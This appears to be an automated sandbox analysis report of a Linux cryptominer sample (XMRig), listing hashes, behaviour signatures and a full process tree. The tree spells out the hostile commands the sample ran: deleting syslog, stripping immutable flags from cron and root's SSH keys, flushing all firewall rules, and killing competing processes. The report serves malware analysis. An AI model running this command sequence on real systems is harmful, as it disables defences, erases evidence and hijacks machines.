Analysis
-
max time kernel
149s -
max time network
143s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
27-09-2024 13:37
Static task
static1
Behavioral task
behavioral1
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
fa8008ca091d7d984279655e9bc577d8_JaffaCakes118
-
Size
30KB
-
MD5
fa8008ca091d7d984279655e9bc577d8
-
SHA1
2cb21f9e3473a1fb6e3718b2018d6eea5f6f5020
-
SHA256
3c0e677024ea8554a0eed96c62ef39549cefebb44937d9c778926daac67d5495
-
SHA512
138f3847581ed8730764453da36c9555dd669e0bf5efc0c6f2433d443afeb4419cd6f190d97417dfa47a8cde3ab145e75664e96b16aad991ab5f10bf8204d9db
-
SSDEEP
384:p7pQBDf6jlpTWg3vMGQiirhHwMyGj4CC9vEKMvU/4Qdre21jT58vKpG2Y0orcfKS:p78zQ5VFNcDAFLcIwgnoYq0xFBVZHttn
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
PID:3126, PID:3130, PID:3135
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
File deleted: /var/log/syslog (process: rm)
-
Flushes firewall rules 1 TTPs 3 IoCs
Flushes/disables firewall rules inside the Linux kernel.
Processes:
PID:1532 ufw, PID:1707 iptables, PID:3075
-
Processes:
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko (PID:1536, process: modprobe)
-
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Disables AppArmor 28 IoCs
Disables AppArmor security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 1 IoCs
Processes:
Changes the process name, possibly in an attempt to hide itself; ioc: (sysv-install); PID:3071
-
Reads CPU attributes 1 TTPs 64 IoCs
Processes:
File opened for reading: /sys/devices/system/cpu/online (processes: ps, pkill, kill)
-
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
File opened for reading: /sys/module/ip6_tables/initstate (process: modprobe)
File opened for reading: /sys/module/x_tables/initstate (process: modprobe)
-
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
PID:1536 modprobe, PID:2087 grep, PID:2117 grep, PID:2331 grep, PID:2871
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
File opened for modification: /tmp/log_rot (process: fa8008ca091d7d984279655e9bc577d8_JaffaCakes118)
Processes
- [1⤵] /tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes118: /tmp/fa8008ca091d7d984279655e9bc577d8_JaffaCakes118 (PID:1526)
  - Writes file to tmp directory
- [2⤵] /bin/rm: rm -rf /var/log/syslog (PID:1527)
  - Deletes system logs
- [2⤵] /usr/bin/chattr: chattr -iua /tmp/ (PID:1528)
  - Attempts to change immutable files
- [2⤵] /usr/bin/chattr: chattr -iua /var/tmp/ (PID:1529)
  - Attempts to change immutable files
- [2⤵] /usr/bin/chattr: chattr -R -i /var/spool/cron (PID:1530)
- [2⤵] /usr/bin/chattr: chattr -i /etc/crontab (PID:1531)
- [2⤵] /usr/sbin/ufw: ufw disable (PID:1532)
  - Flushes firewall rules
- [3⤵] /sbin/iptables: /sbin/iptables -V (PID:1533)
- [3⤵] /lib/ufw/ufw-init: /lib/ufw/ufw-init force-stop (PID:1534)
- [4⤵] /sbin/ip6tables: ip6tables -L INPUT -n (PID:1535)
- [5⤵] /sbin/modprobe: /sbin/modprobe ip6_tables (PID:1536)
  - Loads a kernel module
  - Enumerates kernel/hardware configuration
  - System Network Configuration Discovery
- [4⤵] /sbin/iptables: iptables -F ufw-logging-deny (PID:1543)
- [4⤵] /sbin/iptables: iptables -F ufw-logging-allow (PID:1546)
- [4⤵] /sbin/iptables: iptables -F ufw-not-local (PID:1547)
- [4⤵] /sbin/iptables: iptables -F ufw-user-logging-input (PID:1548)
- [4⤵] /sbin/iptables: iptables -F ufw-user-limit-accept (PID:1549)
- [4⤵] /sbin/iptables: iptables -F ufw-user-limit (PID:1550)
- [4⤵] /sbin/iptables: iptables -F ufw-skip-to-policy-input (PID:1551)
- [4⤵] /sbin/iptables: iptables -F ufw-reject-input (PID:1552)
- [4⤵] /sbin/iptables: iptables -F ufw-after-logging-input (PID:1553)
- [4⤵] /sbin/iptables: iptables -F ufw-after-input (PID:1554)
  - Attempts to change immutable files
- [4⤵] /sbin/iptables: iptables -F ufw-user-input (PID:1555)
- [4⤵] /sbin/iptables: iptables -F ufw-before-input (PID:1556)
  - Attempts to change immutable files
- [4⤵] /sbin/iptables: iptables -F ufw-before-logging-input (PID:1557)
  - Attempts to change immutable files
- [4⤵] /sbin/iptables: iptables -F ufw-skip-to-policy-forward (PID:1558)
- [4⤵] /sbin/iptables: iptables -F ufw-reject-forward (PID:1559)
- [4⤵] /sbin/iptables: iptables -F ufw-after-logging-forward (PID:1560)
- [4⤵] /sbin/iptables: iptables -F ufw-after-forward (PID:1561)
- [4⤵] /sbin/iptables: iptables -F ufw-user-logging-forward (PID:1562)
- [4⤵] /sbin/iptables: iptables -F ufw-user-forward (PID:1563)
- [4⤵] /sbin/iptables: iptables -F ufw-before-forward (PID:1564)
- [4⤵] /sbin/iptables: iptables -F ufw-before-logging-forward (PID:1565)
- [4⤵] /sbin/iptables: iptables -F ufw-track-forward (PID:1566)
- [4⤵] /sbin/iptables: iptables -F ufw-track-output (PID:1567)
- [4⤵] /sbin/iptables: iptables -F ufw-track-input (PID:1568)
  - Attempts to change immutable files
- [4⤵] /sbin/iptables: iptables -F ufw-skip-to-policy-output (PID:1569)
- [4⤵] /sbin/iptables: iptables -F ufw-reject-output (PID:1570)
- [4⤵] /sbin/iptables: iptables -F ufw-after-logging-output (PID:1571)
- [4⤵] /sbin/iptables: iptables -F ufw-after-output (PID:1572)
- [4⤵] /sbin/iptables: iptables -F ufw-user-logging-output (PID:1573)
- [4⤵] /sbin/iptables: iptables -F ufw-user-output (PID:1574)
- [4⤵] /sbin/iptables: iptables -F ufw-before-output (PID:1575)
- [4⤵] /sbin/iptables: iptables -F ufw-before-logging-output (PID:1576)
- [4⤵] /sbin/iptables: iptables -Z ufw-logging-deny (PID:1577)
- [4⤵] /sbin/iptables: iptables -Z ufw-logging-allow (PID:1578)
- [4⤵] /sbin/iptables: iptables -Z ufw-not-local (PID:1579)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-logging-input (PID:1580)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-limit-accept (PID:1581)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-limit (PID:1582)
- [4⤵] /sbin/iptables: iptables -Z ufw-skip-to-policy-input (PID:1583)
- [4⤵] /sbin/iptables: iptables -Z ufw-reject-input (PID:1584)
- [4⤵] /sbin/iptables: iptables -Z ufw-after-logging-input (PID:1585)
- [4⤵] /sbin/iptables: iptables -Z ufw-after-input (PID:1586)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-input (PID:1587)
- [4⤵] /sbin/iptables: iptables -Z ufw-before-input (PID:1588)
  - Attempts to change immutable files
- [4⤵] /sbin/iptables: iptables -Z ufw-before-logging-input (PID:1589)
  - Attempts to change immutable files
- [4⤵] /sbin/iptables: iptables -Z ufw-skip-to-policy-forward (PID:1590)
- [4⤵] /sbin/iptables: iptables -Z ufw-reject-forward (PID:1591)
- [4⤵] /sbin/iptables: iptables -Z ufw-after-logging-forward (PID:1592)
- [4⤵] /sbin/iptables: iptables -Z ufw-after-forward (PID:1593)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-logging-forward (PID:1594)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-forward (PID:1595)
- [4⤵] /sbin/iptables: iptables -Z ufw-before-forward (PID:1596)
- [4⤵] /sbin/iptables: iptables -Z ufw-before-logging-forward (PID:1597)
- [4⤵] /sbin/iptables: iptables -Z ufw-track-forward (PID:1598)
- [4⤵] /sbin/iptables: iptables -Z ufw-track-output (PID:1599)
- [4⤵] /sbin/iptables: iptables -Z ufw-track-input (PID:1600)
- [4⤵] /sbin/iptables: iptables -Z ufw-skip-to-policy-output (PID:1601)
- [4⤵] /sbin/iptables: iptables -Z ufw-reject-output (PID:1602)
- [4⤵] /sbin/iptables: iptables -Z ufw-after-logging-output (PID:1603)
- [4⤵] /sbin/iptables: iptables -Z ufw-after-output (PID:1604)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-logging-output (PID:1605)
- [4⤵] /sbin/iptables: iptables -Z ufw-user-output (PID:1606)
- [4⤵] /sbin/iptables: iptables -Z ufw-before-output (PID:1607)
- [4⤵] /sbin/iptables: iptables -Z ufw-before-logging-output (PID:1608)
- [4⤵] /sbin/iptables: iptables -X ufw-logging-deny (PID:1609)
- [4⤵] /sbin/iptables: iptables -X ufw-logging-allow (PID:1610)
- [4⤵] /sbin/iptables: iptables -X ufw-not-local (PID:1611)
- [4⤵] /sbin/iptables: iptables -X ufw-user-logging-input (PID:1612)
- [4⤵] /sbin/iptables: iptables -X ufw-user-logging-output (PID:1613)
- [4⤵] /sbin/iptables: iptables -X ufw-user-logging-forward (PID:1614)
- [4⤵] /sbin/iptables: iptables -X ufw-user-limit-accept (PID:1615)
- [4⤵] /sbin/iptables: iptables -X ufw-user-limit (PID:1616)
- [4⤵] /sbin/iptables: iptables -X ufw-user-input (PID:1617)
- [4⤵] /sbin/iptables: iptables -X ufw-user-forward (PID:1618)
- [4⤵] /sbin/iptables: iptables -X ufw-user-output (PID:1619)
- [4⤵] /sbin/iptables: iptables -X ufw-skip-to-policy-input (PID:1620)
- [4⤵] /sbin/iptables: iptables -X ufw-skip-to-policy-output (PID:1621)
- [4⤵] /sbin/iptables: iptables -X ufw-skip-to-policy-forward (PID:1622)
- [4⤵] /sbin/iptables: iptables -P INPUT ACCEPT (PID:1623)
- [4⤵] /sbin/iptables: iptables -P OUTPUT ACCEPT (PID:1624)
- [4⤵] /sbin/iptables: iptables -P FORWARD ACCEPT (PID:1625)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-logging-deny (PID:1626)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-logging-allow (PID:1627)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-not-local (PID:1628)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-logging-input (PID:1629)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-limit-accept (PID:1630)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-limit (PID:1631)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-input (PID:1632)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-reject-input (PID:1633)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-after-logging-input (PID:1634)
  - Attempts to change immutable files
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-after-input (PID:1635)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-input (PID:1636)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-before-input (PID:1637)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-before-logging-input (PID:1638)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-forward (PID:1639)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-reject-forward (PID:1640)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-after-logging-forward (PID:1641)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-after-forward (PID:1642)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-logging-forward (PID:1643)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-forward (PID:1644)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-before-forward (PID:1645)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-before-logging-forward (PID:1646)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-track-forward (PID:1647)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-track-output (PID:1648)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-track-input (PID:1649)
  - Attempts to change immutable files
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-skip-to-policy-output (PID:1650)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-reject-output (PID:1651)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-after-logging-output (PID:1652)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-after-output (PID:1653)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-logging-output (PID:1654)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-user-output (PID:1655)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-before-output (PID:1656)
- [4⤵] /sbin/ip6tables: ip6tables -F ufw6-before-logging-output (PID:1657)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-logging-deny (PID:1658)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-logging-allow (PID:1659)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-not-local (PID:1660)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-logging-input (PID:1661)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-limit-accept (PID:1662)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-limit (PID:1663)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-input (PID:1664)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-reject-input (PID:1665)
  - Attempts to change immutable files
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-after-logging-input (PID:1666)
  - Attempts to change immutable files
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-after-input (PID:1667)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-input (PID:1668)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-before-input (PID:1669)
  - Attempts to change immutable files
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-before-logging-input (PID:1670)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-forward (PID:1671)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-reject-forward (PID:1672)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-after-logging-forward (PID:1673)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-after-forward (PID:1674)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-logging-forward (PID:1675)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-forward (PID:1676)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-before-forward (PID:1677)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-before-logging-forward (PID:1678)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-track-forward (PID:1679)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-track-output (PID:1680)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-track-input (PID:1681)
  - Attempts to change immutable files
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-skip-to-policy-output (PID:1682)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-reject-output (PID:1683)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-after-logging-output (PID:1684)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-after-output (PID:1685)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-logging-output (PID:1686)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-user-output (PID:1687)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-before-output (PID:1688)
- [4⤵] /sbin/ip6tables: ip6tables -Z ufw6-before-logging-output (PID:1689)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-logging-deny (PID:1690)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-logging-allow (PID:1691)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-not-local (PID:1692)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-logging-input (PID:1693)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-logging-output (PID:1694)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-logging-forward (PID:1695)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-limit-accept (PID:1696)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-limit (PID:1697)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-input (PID:1698)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-forward (PID:1699)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-user-output (PID:1700)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-input (PID:1701)
  - Attempts to change immutable files
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-output (PID:1702)
- [4⤵] /sbin/ip6tables: ip6tables -X ufw6-skip-to-policy-forward (PID:1703)
- [4⤵] /sbin/ip6tables: ip6tables -P INPUT ACCEPT (PID:1704)
- [4⤵] /sbin/ip6tables: ip6tables -P OUTPUT ACCEPT (PID:1705)
- [4⤵] /sbin/ip6tables: ip6tables -P FORWARD ACCEPT (PID:1706)
- [2⤵] /sbin/iptables: iptables -F (PID:1707)
  - Flushes firewall rules
- [2⤵] /usr/bin/sudo: sudo sysctl "kernel.nmi_watchdog=0" (PID:1708)
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- [2⤵] /usr/sbin/userdel: userdel akay (PID:1712)
- [2⤵] /usr/sbin/userdel: userdel vfinder (PID:1713)
- [2⤵] /usr/bin/chattr: chattr -iae /root/.ssh/ (PID:1720)
- [2⤵] /usr/bin/chattr: chattr -iae /root/.ssh/authorized_keys (PID:1721)
  - Attempts to change immutable files
- [2⤵] /bin/rm: rm -rf "/tmp/addres*" (PID:1722)
- [2⤵] /bin/rm: rm -rf "/tmp/walle*" (PID:1723)
- [2⤵] /bin/rm: rm -rf /tmp/keys (PID:1724)
- [2⤵] /bin/grep: grep -i "[a]liyun" (PID:1726)
- [2⤵] /bin/ps: ps aux (PID:1725)
  - Process Discovery
- [2⤵] /bin/grep: grep -i "[y]unjing" (PID:1728)
  - Attempts to change immutable files
- [2⤵] /bin/ps: ps aux (PID:1727)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1733)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1732)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1731)
- [2⤵] /bin/grep: grep 185.71.65.238 (PID:1730)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1738)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1737)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1736)
- [2⤵] /bin/grep: grep 140.82.52.87 (PID:1735)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1744)
- [2⤵] /bin/grep: grep -v - (PID:1743)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1742)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1741)
- [2⤵] /bin/grep: grep :143 (PID:1740)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1750)
- [2⤵] /bin/grep: grep -v - (PID:1749)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1748)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1747)
- [2⤵] /bin/grep: grep :2222 (PID:1746)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1756)
- [2⤵] /bin/grep: grep -v - (PID:1755)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1754)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1753)
- [2⤵] /bin/grep: grep :3333 (PID:1752)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1762)
- [2⤵] /bin/grep: grep -v - (PID:1761)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1760)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1759)
- [2⤵] /bin/grep: grep :3389 (PID:1758)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1768)
- [2⤵] /bin/grep: grep -v - (PID:1767)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1766)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1765)
- [2⤵] /bin/grep: grep :4444 (PID:1764)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1774)
- [2⤵] /bin/grep: grep -v - (PID:1773)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1772)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1771)
- [2⤵] /bin/grep: grep :5555 (PID:1770)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1780)
- [2⤵] /bin/grep: grep -v - (PID:1779)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1778)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1777)
- [2⤵] /bin/grep: grep :6666 (PID:1776)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1786)
- [2⤵] /bin/grep: grep -v - (PID:1785)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1784)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1783)
- [2⤵] /bin/grep: grep :6665 (PID:1782)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1792)
  - Attempts to change immutable files
- [2⤵] /bin/grep: grep -v - (PID:1791)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1790)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1789)
- [2⤵] /bin/grep: grep :6667 (PID:1788)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1798)
- [2⤵] /bin/grep: grep -v - (PID:1797)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1796)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1795)
- [2⤵] /bin/grep: grep :7777 (PID:1794)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1804)
- [2⤵] /bin/grep: grep -v - (PID:1803)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1802)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1801)
- [2⤵] /bin/grep: grep :8444 (PID:1800)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1810)
- [2⤵] /bin/grep: grep -v - (PID:1809)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1808)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1807)
- [2⤵] /bin/grep: grep :3347 (PID:1806)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1816)
- [2⤵] /bin/grep: grep -v - (PID:1815)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1814)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1813)
- [2⤵] /bin/grep: grep :14444 (PID:1812)
- [2⤵] /bin/grep: grep -v - (PID:1821)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1822)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1820)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1819)
- [2⤵] /bin/grep: grep :14433 (PID:1818)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1828)
  - Attempts to change immutable files
- [2⤵] /bin/grep: grep -v - (PID:1827)
- [2⤵] /usr/bin/awk: awk "-F[/]" "{print \$1}" (PID:1826)
- [2⤵] /usr/bin/awk: awk "{print \$7}" (PID:1825)
- [2⤵] /bin/grep: grep :13531 (PID:1824)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1830)
- [2⤵] /bin/cat: cat /tmp/.X11-unix/01 (PID:1829)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1832)
- [2⤵] /bin/cat: cat /tmp/.X11-unix/11 (PID:1831)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1834)
- [2⤵] /bin/cat: cat /tmp/.X11-unix/22 (PID:1833)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1836)
- [2⤵] /bin/cat: cat /tmp/.pg_stat.0 (PID:1835)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1838)
- [2⤵] /bin/cat: cat /tmp/.pg_stat.1 (PID:1837)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1840)
  - Attempts to change immutable files
- [2⤵] /bin/cat: cat /data/./oka.pid (PID:1839)
- [2⤵] /usr/bin/pkill: pkill -f zsvc (PID:1841)
  - Reads CPU attributes
- [2⤵] /usr/bin/pkill: pkill -f pdefenderd (PID:1842)
- [2⤵] /usr/bin/pkill: pkill -f updatecheckerd (PID:1843)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1848)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1847)
- [2⤵] /bin/grep: grep -v grep (PID:1846)
- [2⤵] /bin/grep: grep ./oka (PID:1845)
- [2⤵] /bin/ps: ps aux (PID:1844)
  - Process Discovery
  - Reads runtime system information
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1853)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1852)
- [2⤵] /bin/grep: grep -v grep (PID:1851)
- [2⤵] /bin/grep: grep "postgres: autovacum" (PID:1850)
- [2⤵] /bin/ps: ps aux (PID:1849)
  - Process Discovery
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1865)
  - Attempts to change immutable files
- [2⤵] /bin/grep: grep -v kinsing (PID:1863)
- [2⤵] /bin/grep: grep -v postgres (PID:1861)
- [2⤵] /bin/grep: grep -v postgrey (PID:1862)
- [2⤵] /bin/grep: grep -v proxymap (PID:1860)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1864)
- [2⤵] /bin/grep: grep -v php-fpm (PID:1859)
- [2⤵] /bin/grep: grep -v "(" (PID:1858)
- [2⤵] /bin/grep: grep -v "\\[" (PID:1857)
- [2⤵] /bin/grep: grep -v bin (PID:1856)
- [2⤵] /usr/bin/awk: awk "length(\$1) == 8" (PID:1855)
- [2⤵] /bin/ps: ps ax -o "command,pid" -www (PID:1854)
  - Reads runtime system information
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1876)
- [3⤵] /usr/local/sbin/kill: kill -9 1274 (PID:1877)
- [3⤵] /usr/local/bin/kill: kill -9 1274 (PID:1877)
- [3⤵] /usr/sbin/kill: kill -9 1274 (PID:1877)
- [3⤵] /usr/bin/kill: kill -9 1274 (PID:1877)
- [3⤵] /sbin/kill: kill -9 1274 (PID:1877)
- [3⤵] /bin/kill: kill -9 1274 (PID:1877)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1875)
- [2⤵] /bin/grep: grep -v postgres (PID:1873)
- [2⤵] /bin/grep: grep -v postgrey (PID:1874)
- [2⤵] /bin/grep: grep -v proxymap (PID:1872)
- [2⤵] /bin/grep: grep -v php-fpm (PID:1871)
- [2⤵] /bin/grep: grep -v "(" (PID:1870)
- [2⤵] /bin/grep: grep -v "\\[" (PID:1869)
- [2⤵] /bin/grep: grep -v bin (PID:1868)
- [2⤵] /usr/bin/awk: awk "length(\$1) == 16" (PID:1867)
- [2⤵] /bin/ps: ps ax -o "command,pid" -www (PID:1866)
  - Reads CPU attributes
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1888)
- [2⤵] /usr/bin/awk: awk "{print \$1}" (PID:1887)
- [2⤵] /bin/grep: grep -v postgrey (PID:1886)
- [2⤵] /bin/grep: grep -v postgres (PID:1885)
- [2⤵] /bin/grep: grep -v proxymap (PID:1884)
- [2⤵] /bin/grep: grep -v php-fpm (PID:1883)
- [2⤵] /bin/grep: grep -v "(" (PID:1882)
- [2⤵] /bin/grep: grep -v "\\[" (PID:1881)
- [2⤵] /bin/grep: grep -v bin (PID:1880)
- [2⤵] /usr/bin/awk: awk "length(\$5) == 8" (PID:1879)
- [2⤵] /bin/ps: ps ax (PID:1878)
